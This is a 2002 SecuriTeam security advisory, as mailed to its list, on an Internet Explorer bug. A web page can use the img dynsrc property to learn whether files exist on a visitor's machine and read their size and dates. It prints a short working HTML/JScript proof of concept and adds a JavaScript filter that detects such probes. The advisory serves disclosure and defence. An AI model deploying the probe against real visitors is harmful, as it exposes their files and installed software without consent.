[NT] Retrieving Information on Local Files Via Internet Explorer

From: support@securiteam.com
Date: 03/28/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 28 Mar 2002 13:22:23 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Retrieving Information on Local Files Via Internet Explorer
------------------------------------------------------------------------

SUMMARY

The <img> element is commonly used to present images in an HTML document.
However, it also contains a feature that allows it to present other types
of media, such as VRML, AVI, MPEG, etc. This feature is exposed as a
property named dynsrc.

This creates a security vulnerability: a remote page can gain sensitive
information about files residing on the client's computer (such as whether
a file exists, its size, its modification date, etc.).

DETAILS

Affected applications:
All tested versions of Microsoft Internet Explorer (IE5+); prior versions
may be vulnerable as well. Tested versions:
 * Internet Explorer 5 SP2
 * Internet Explorer 5.5 SP2
 * Internet Explorer 6 SP1

The problem lies within the implementation of the dynsrc property, which
does not validate the source at all and exposes the assigned file to script
even when the file cannot be presented as media.

Once a file name has been assigned to the dynsrc property, its existence
can be determined by reading the fileSize property of the <img> element: a
return value of -1 means the file does not exist, and any greater value
means the file exists.

When a file is known to exist, additional information can be extracted
from the <img> element, such as:
 * The file size in bytes, using the fileSize property.
 * The date the file was created, using the fileCreatedDate property.
 * The date the file was last modified, using the fileModifiedDate property.
 * The date the file was last updated, using the fileUpdatedDate property.

A malicious attacker may use this bug in conjunction with other bugs to
detect files or determine whether the user has specific programs (and even
specific versions, according to size) installed, etc.

Exploit:
This simple example demonstrates how the bug is used to check whether
"c:/test.txt" exists and retrieves its additional properties if it does.

<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
setTimeout(
        function () {
                alert(
                        oFile.fileSize>-1 ?
                                "File exists!\n\n"+
                                "Size: "+oFile.fileSize+" bytes.\n"+
                                "Created: "+oFile.fileCreatedDate+".\n"+
                                "Modified: "+oFile.fileModifiedDate+".\n"+
                                "Updated: "+oFile.fileUpdatedDate+"."
                        :
                                "File does not exist."
                );
        },
        250
);
</script>
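The probe above is easy to recognise in transit, since it depends on an IE-only attribute pointing at a local path. The following is an added example written for this edition, not part of the advisory or GreyMagic's code: a small content filter (for a proxy, mail gateway or IDS rule set) that scans HTML for <img> tags whose dynsrc attribute references a local file. It flags the file: scheme the advisory uses and, as an assumption about how IE resolves bare drive-letter paths, also flags values such as C:\...; the sample HTML is constructed for the example.

```javascript
// Added example: detect <img dynsrc=...> probes against local files.
// Not code from the advisory; the drive-letter heuristic is an assumption.

// Match whole <img ...> start tags, case-insensitively. Limitation: a literal
// '>' inside an attribute value would end the match early.
const IMG_TAG_RE = /<img\b[^>]*>/gi;

// Match dynsrc="..." , dynsrc='...' or an unquoted dynsrc=value.
const DYNSRC_ATTR_RE = /\bdynsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;

// Decide whether an attribute value points at the client's local filesystem.
function isLocalFileReference(value) {
  const v = value.trim();
  if (/^file:/i.test(v)) return true;       // file://c:/test.txt (the advisory's form)
  if (/^[a-z]:[\\/]/i.test(v)) return true; // C:\... or C:/... (assumed local resolution)
  return false;
}

// Return one finding per <img> tag whose dynsrc references a local file.
function findDynsrcLocalFileProbes(html) {
  const findings = [];
  for (const tag of html.match(IMG_TAG_RE) || []) {
    const m = tag.match(DYNSRC_ATTR_RE);
    if (!m) continue;
    const target = m[1] ?? m[2] ?? m[3] ?? "";
    if (isLocalFileReference(target)) {
      findings.push({ tag, target });
    }
  }
  return findings;
}

// Constructed sample page: a benign image, a benign remote dynsrc video,
// the advisory's probe, and a hidden probe for an installed program.
const SAMPLE_HTML = `
<html><body>
<img src="logo.gif">
<img dynsrc="http://example.com/movie.avi" src="poster.gif">
<img dynsrc="file://c:/test.txt" id="oFile">
<IMG DYNSRC='C:\\Program Files\\app\\app.exe' style="display:none">
</body></html>`;

// Stand-alone run: print each flagged tag and its target.
for (const f of findDynsrcLocalFileProbes(SAMPLE_HTML)) {
  console.log(`local dynsrc probe -> ${f.target}\n  in: ${f.tag}`);
}
```

Only the two local references are reported; the remote AVI and the plain <img src> are left alone, which keeps the rule usable on pages that legitimately use dynsrc for media.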

Solution:
Microsoft was first informed on 18 Feb 2002 (38 days ago), they have
opened an investigation regarding this issue and will probably release a
patch in the near future.

Until a patch becomes available, the only workaround is to disable Active
Scripting.

ADDITIONAL INFORMATION

The information has been provided by GreyMagic Software
<security@greymagic.com>.

========================================


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.